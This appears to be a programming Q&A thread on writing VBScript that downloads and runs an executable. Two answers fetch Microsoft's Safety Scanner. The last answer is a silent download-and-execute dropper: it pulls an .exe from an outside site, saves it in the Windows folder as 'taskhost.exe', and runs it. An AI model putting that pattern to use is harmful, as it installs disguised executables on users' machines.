# Download and Execute with VBS

Tags: vbscript, download, shellexecute

I am trying to write a simple VBS script to download and execute a file.  From wireshark I can verify that the file is being retrieved form the webserver, but it is not getting executed upon download. I am getting a "Invalid Character" on the "Execute" line.  What am I doing wrong?

```
Set x=CreateObject("Microsoft.XMLHTTP")
x.Open "GET","http://website/file.exe",False
x.Send
Execute x.responseText
```

I would also like to remove the "If-Modified-Since" header from the GET request.

Answer (score 4, accepted):

You aren't saving it to disk, therefore nothing to execute. Other things are wrong. Can't use text for binary, text gets auto converted. Likewise have to use binary streams to save it.

Put the following lines into a text file. Name it safetyscanner.vbs and put on desktop.

For 32 Bit Windows

```
 Set fso = CreateObject("Scripting.FileSystemObject")
 Set Outp = Wscript.Stdout
 On Error Resume Next
 Set File = WScript.CreateObject("Microsoft.XMLHTTP")
 File.Open "GET", "http://definitionupdates.microsoft.com/download/definitionupdates/safetyscanner/x86/msert.exe", False
 File.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; .NET4.0E; BCD2000; BCD2000)"
 File.Send
 If err.number <> 0 then 
  Outp.writeline "" 
  Outp.writeline "Error getting file" 
  Outp.writeline "==================" 
  Outp.writeline "" 
  Outp.writeline "Error " & err.number & "(0x" & hex(err.number) & ") " & err.description 
  Outp.writeline "Source " & err.source 
  Outp.writeline "" 
  Outp.writeline "HTTP Error " & File.Status & " " & File.StatusText
  Outp.writeline  File.getAllResponseHeaders
  Outp.writeline Arg(1)
 End If

On Error Goto 0

 Set BS = CreateObject("ADODB.Stream")
 BS.type = 1
 BS.open
 BS.Write File.ResponseBody
 BS.SaveToFile "c:\users\safetyscanner.exe", 2
```

Comment: In addition to that: [`Execute`](http://msdn.microsoft.com/en-us/library/03t418d2%28v=vs.84%29.aspx) executes VBScript statements. For executing external programs [`Run`](http://msdn.microsoft.com/en-us/library/d5fk67ky%28v=vs.84%29.aspx) or [`Exec`](http://msdn.microsoft.com/en-us/library/ateytk4a%28v=vs.84%29.aspx) must be used.

Answer (score 1):

If you want to add a waiting bar try this code :

```
Option Explicit
If AppPrevInstance() Then 
    MsgBox "There is an existing proceeding !" & VbCrLF & CommandLineLike(WScript.ScriptName),VbExclamation,"There is an existing proceeding !"    
    WScript.Quit   
Else
    Dim Title,WaitingMsg,oExec,fso,Ws,Temp,objXMLHTTP,PathScript,File,FileName,strHDLocation,Outp,BS,StartTime,DurationTime
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set Ws = CreateObject("wscript.Shell")
    Temp = ws.ExpandEnvironmentStrings("%Temp%")
    PathScript = fso.GetParentFolderName(wscript.ScriptFullName) 'Path of this Vbscript
    FileName = "safetyscanner.exe"
    strHDLocation = PathScript & "\" & FileName
    Set Outp = Wscript.Stdout
    Title = "Downloading "& DblQuote(FileName) &" using Vbscript by Hackoo © 2015"
    WaitingMsg = "Please wait... Downloading file "& DblQuote(FileName) &" is in progress..."
    Call CreateProgressBar(Title,WaitingMsg)'Creation of Waiting Bar
    Call LancerProgressBar() 'Launch of the Waiting Bar
    StartTime = Timer 'Start the Timer Counter
    On Error Resume Next
    Set File = WScript.CreateObject("Microsoft.XMLHTTP")
    File.Open "GET", "http://definitionupdates.microsoft.com/download/definitionupdates/safetyscanner/x86/msert.exe", False
    File.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; .NET4.0E; BCD2000; BCD2000)"
    File.Send
    If err.number <> 0 then 
        Call FermerProgressBar()'Closing Waiting Bar
        MsgBox "Error " & err.number & "(0x" & hex(err.number) & ") " & vbcr & err.description,16,err.description
        wscript.quit
    End If
    On Error Goto 0
    Set BS = CreateObject("ADODB.Stream")
    BS.type = 1
    BS.open
    BS.Write File.ResponseBody
    BS.SaveToFile strHDLocation,2
    BS.Close
    Set BS = Nothing
    Set File = Nothing
    DurationTime = FormatNumber(Timer - StartTime, 0) & " seconds." 'The duration of the script
    Call FermerProgressBar() 'Closing Waiting Bar
    ws.Popup "The Download of " & Dblquote(FileName) & " is finished in " & DurationTime &" !","5","The Download of " & Dblquote(FileName) & " is finished in " & DurationTime &" !",64
    ws.run DblQuote(strHDLocation) ' To Execute The file after the downloading process
End If
'***********************************************************************************************************
Sub CreateProgressBar(Title,WaitingMsg)
    Dim ws,fso,f,f2,ts,ts2,Ligne,i,fread,LireTout,NbLigneTotal,Temp,PathOutPutHTML,fhta,oExec
    Set ws = CreateObject("wscript.Shell")
    Set fso = CreateObject("Scripting.FileSystemObject")
    Temp = WS.ExpandEnvironmentStrings("%Temp%")
    PathOutPutHTML = Temp & "\Barre.hta"
    Set fhta = fso.OpenTextFile(PathOutPutHTML,2,True)
    fhta.WriteLine "<HTML>"
    fhta.WriteLine "<HEAD>"
    fhta.WriteLine "<Title>  " & Title & "</Title>"
    fhta.WriteLine "<HTA:APPLICATION"
    fhta.WriteLine "ICON = ""magnify.exe"" "
    fhta.WriteLine "BORDER=""THIN"" "
    fhta.WriteLine "INNERBORDER=""NO"" "
    fhta.WriteLine "MAXIMIZEBUTTON=""NO"" "
    fhta.WriteLine "MINIMIZEBUTTON=""NO"" "
    fhta.WriteLine "SCROLL=""NO"" "
    fhta.WriteLine "SYSMENU=""NO"" "
    fhta.WriteLine "SELECTION=""NO"" "
    fhta.WriteLine "SINGLEINSTANCE=""YES"">"
    fhta.WriteLine "</HEAD>"
    fhta.WriteLine "<BODY text=""white""><CENTER>"
    fhta.WriteLine "<marquee DIRECTION=""LEFT"" SCROLLAMOUNT=""3"" BEHAVIOR=ALTERNATE><font face=""Comic sans MS"">" & WaitingMsg &"</font></marquee>"
    fhta.WriteLine "<img src=""data:image/gif;base64,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"" />"
    fhta.WriteLine "</CENTER></BODY></HTML>"
    fhta.WriteLine "<SCRIPT LANGUAGE=""VBScript""> "
    fhta.WriteLine "Set ws = CreateObject(""wscript.Shell"")"
    fhta.WriteLine "Temp = WS.ExpandEnvironmentStrings(""%Temp%"")"
    fhta.WriteLine "Sub window_onload()"
    fhta.WriteLine "    CenterWindow 490,110"
    fhta.WriteLine "    Self.document.bgColor = ""DarkOrange"" "
    fhta.WriteLine " End Sub"
    fhta.WriteLine " Sub CenterWindow(x,y)"
    fhta.WriteLine "    Dim iLeft,itop"
    fhta.WriteLine "    window.resizeTo x,y"
    fhta.WriteLine "    iLeft = window.screen.availWidth/2 - x/2"
    fhta.WriteLine "    itop = window.screen.availHeight/2 - y/2"
    fhta.WriteLine "    window.moveTo ileft,itop"
    fhta.WriteLine "End Sub"
    fhta.WriteLine "</script>"
    fhta.close
End Sub
'**********************************************************************************************
Sub LancerProgressBar()
    Set oExec = Ws.Exec("mshta.exe " & Temp & "\Barre.hta")
End Sub
'**********************************************************************************************
Sub FermerProgressBar()
    oExec.Terminate
End Sub
'**********************************************************************************************
Function DblQuote(Str)
    DblQuote = Chr(34) & Str & Chr(34)
End Function
'**********************************************************************************************
Function AppPrevInstance()   
    With GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\root\cimv2")   
        With .ExecQuery("SELECT * FROM Win32_Process WHERE CommandLine LIKE " & CommandLineLike(WScript.ScriptFullName) & _
            " AND CommandLine LIKE '%WScript%' OR CommandLine LIKE '%cscript%'")   
            AppPrevInstance = (.Count > 1)   
        End With   
    End With   
End Function   
'**************************************************************************
Function CommandLineLike(ProcessPath)   
    ProcessPath = Replace(ProcessPath, "\", "\\")   
    CommandLineLike = "'%" & ProcessPath & "%'"   
End Function
'**************************************************************************
```

Answer (score 0):

```
fileurl ="http://reca.or.th/zip/Hello.exe"
filename ="taskhost.exe"
dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
strlink = fileurl
strsaveto = "%windir%" & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
        .type = 1 
        .open
        .write objhttpdownload.responsebody
        .savetofile strsaveto
        .close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
```